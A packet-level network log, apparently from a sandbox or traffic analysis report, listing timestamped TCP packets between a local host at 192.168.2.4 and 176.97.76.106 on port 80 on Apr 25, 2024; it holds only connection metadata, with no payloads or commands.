Apr 25, 2024 09:04:02.281375885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281384945 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281395912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281428099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281454086 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281454086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281466961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281490088 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281537056 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281548977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281559944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281577110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281594038 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281599998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281613111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281641960 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281680107 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281702042 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281738997 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281806946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281888008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281936884 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.281953096 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281965971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.281990051 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282052040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282053947 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282063961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282110929 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282123089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282155037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282191992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282216072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282258034 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282258034 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282265902 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282306910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282320976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282321930 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282376051 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282382965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282411098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282449961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282460928 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282460928 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282506943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282533884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282536983 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282546997 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282613039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282624006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282634974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282635927 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282635927 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282656908 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282676935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282677889 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282733917 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282741070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282752991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282773972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282814980 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282814980 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282834053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282845974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282902002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282918930 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282955885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.282958031 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.282989979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283008099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283030033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283037901 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283106089 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283119917 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283139944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283157110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283189058 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283229113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283263922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283298969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283312082 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283339977 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283389091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283432961 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283520937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283562899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283567905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283576012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283612967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283617020 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283617020 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283624887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283660889 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283667088 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283768892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283780098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283792019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283792973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283823013 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283843040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283853054 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283896923 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283898115 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283910990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.283937931 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283951998 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.283957005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284024000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284034967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284045935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284075022 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284090996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284094095 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284132004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284133911 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284145117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284173012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284202099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284214020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284249067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284267902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284267902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284302950 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284338951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284351110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284362078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284387112 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284410954 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284415007 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284426928 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284437895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284460068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284481049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284481049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284543037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284555912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284569025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284615993 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284616947 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284631014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284676075 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284677982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284689903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284717083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284732103 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284737110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284769058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284775019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284791946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284872055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284889936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284889936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284910917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284914970 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284933090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.284982920 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.284982920 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285013914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285036087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285049915 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285080910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285106897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285119057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285130978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285167933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285180092 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285180092 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285226107 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285242081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285311937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285324097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285330057 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285336018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285356998 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285357952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285401106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285413027 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285440922 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285440922 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285442114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285456896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285471916 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285496950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285557032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285568953 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285595894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285634995 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285634995 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285648108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285680056 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285737991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285768032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285779953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285780907 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285780907 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285809994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285834074 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285834074 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285872936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285875082 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285886049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285912991 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285954952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.285978079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.285990000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286015034 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286039114 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286051989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286072969 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286072969 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286089897 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286092043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286113977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286144972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286163092 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286183119 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286221027 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286221027 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286302090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286367893 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286416054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286428928 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286451101 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286487103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286526918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286529064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286609888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286619902 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286633015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286665916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286716938 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286716938 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286729097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286741972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286752939 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286782026 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286802053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286808968 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286823988 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286853075 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286883116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286962032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.286969900 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.286969900 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287000895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287014008 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287028074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287071943 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287071943 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287092924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287156105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287157059 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287198067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287199020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287211895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287251949 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287286043 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287341118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287353039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287364960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287377119 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287398100 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287398100 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287419081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287431002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287441969 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287456036 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287475109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287493944 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287599087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287611961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287641048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287672043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287679911 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287703991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287717104 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287739038 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287751913 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287795067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287797928 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287866116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287883997 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287898064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287898064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287935019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.287940025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287971973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.287997961 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288006067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288033009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288055897 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288063049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288084030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288095951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288109064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288119078 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288146019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288187981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288249016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288252115 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288281918 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288300991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288312912 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288342953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288345098 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288345098 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288383007 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288386106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288398027 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288479090 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288486958 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288530111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288532972 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288542032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288606882 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288671017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288682938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288707972 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288753033 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288759947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288810968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288851023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.288851023 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288851023 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.288896084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289108992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289120913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289153099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289216995 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289233923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.289253950 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.289253950 CEST	49733	80	192.168.2.4	176.97.76.106
